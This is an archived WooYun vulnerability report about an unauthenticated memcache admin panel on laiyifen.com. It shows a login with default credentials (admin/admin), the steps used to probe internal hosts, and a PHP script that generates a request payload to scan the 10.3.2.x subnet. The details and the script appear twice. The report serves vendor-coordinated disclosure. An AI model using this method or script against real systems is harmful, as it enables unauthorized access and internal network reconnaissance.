当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0183041

漏洞标题:来伊份主站memcache未授权访问可探测内网(附测试脚本)

相关厂商:laiyifen.com

漏洞作者: 镱鍚

提交时间:2016-03-10 17:35

修复时间:2016-04-25 10:04

公开时间:2016-04-25 10:04

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-10: 细节已通知厂商并且等待厂商处理中
2016-03-11: 厂商已经确认,细节仅向厂商公开
2016-03-21: 细节向核心白帽子及相关领域专家公开
2016-03-31: 细节向普通白帽子公开
2016-04-10: 细节向实习白帽子公开
2016-04-25: 细节向公众公开

简要描述:

看来伊份这么多洞上首页,我也来一份!^_^

详细说明:

URL:

http://www.laiyifen.com/memadmin/index.php


来一份主站,memcache管理后台

1.png


admin admin 成功登陆

2.png


这里可以添加内网IP,从而探测内网主机存活状态
经过前人思路指点,加上抓包流量分析,点击开始管理,抓包

3.png


4.png


在经过url解码,即可找出规律。
这里利用10.3.2.X这个网段来测试,shell脚本不会,就自己写了个php的,将所有的c段添加到管理,成功

5.png


6.png


最后就简单了,遍历num参数爆破,成功探测到一台主机

7.png


8.png


相信你们内网不止这一台memcache服务器,这里证明即可,就难得去一一探测了。危害你们更懂。。
利用脚本

<?php
$str1='data[0][con][0][num]=255&';
$str3='data[1][conp][0][num]=0';

for($i=0;$i<255;$i++){
$str2='data[0][con][0][cons]['.$i.'][name]=n'.$i.'&data[0][con][0][cons]['.$i.'][host]=10.3.2.'.$i.'&data[0][con][0][cons]['.$i.'][port]=11211&data[0][con][0][cons]['.$i.'][ispcon]=0&data[0][con][0][cons]['.$i.'][timeout]=1&';
$str1.=$str2;
}

$str1.=$str3;

echo $str1;
?>


写的太菜,大牛勿喷。。

漏洞证明:

URL:

http://www.laiyifen.com/memadmin/index.php


来一份主站,memcache管理后台

1.png


admin admin 成功登陆

2.png


这里可以添加内网IP,从而探测内网主机存活状态
经过前人思路指点,加上抓包流量分析,点击开始管理,抓包

3.png


4.png


在经过url解码,即可找出规律。
这里利用10.3.2.X这个网段来测试,shell脚本不会,就自己写了个php的,将所有的c段添加到管理,成功

5.png


6.png


最后就简单了,遍历num参数爆破,成功探测到一台主机

7.png


8.png


相信你们内网不止这一台memcache服务器,这里证明即可,就难得去一一探测了。危害你们更懂。。
利用脚本

<?php
$str1='data[0][con][0][num]=255&';
$str3='data[1][conp][0][num]=0';

for($i=0;$i<255;$i++){
$str2='data[0][con][0][cons]['.$i.'][name]=n'.$i.'&data[0][con][0][cons]['.$i.'][host]=10.3.2.'.$i.'&data[0][con][0][cons]['.$i.'][port]=11211&data[0][con][0][cons]['.$i.'][ispcon]=0&data[0][con][0][cons]['.$i.'][timeout]=1&';
$str1.=$str2;
}

$str1.=$str3;

echo $str1;
?>


写的太菜,大牛勿喷。。

修复方案:

限制访问

版权声明:转载请注明来源 镱鍚@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-03-11 10:04

厂商回复:

谢谢大家的支持,我们尽快修复,非常感谢!

最新状态:

暂无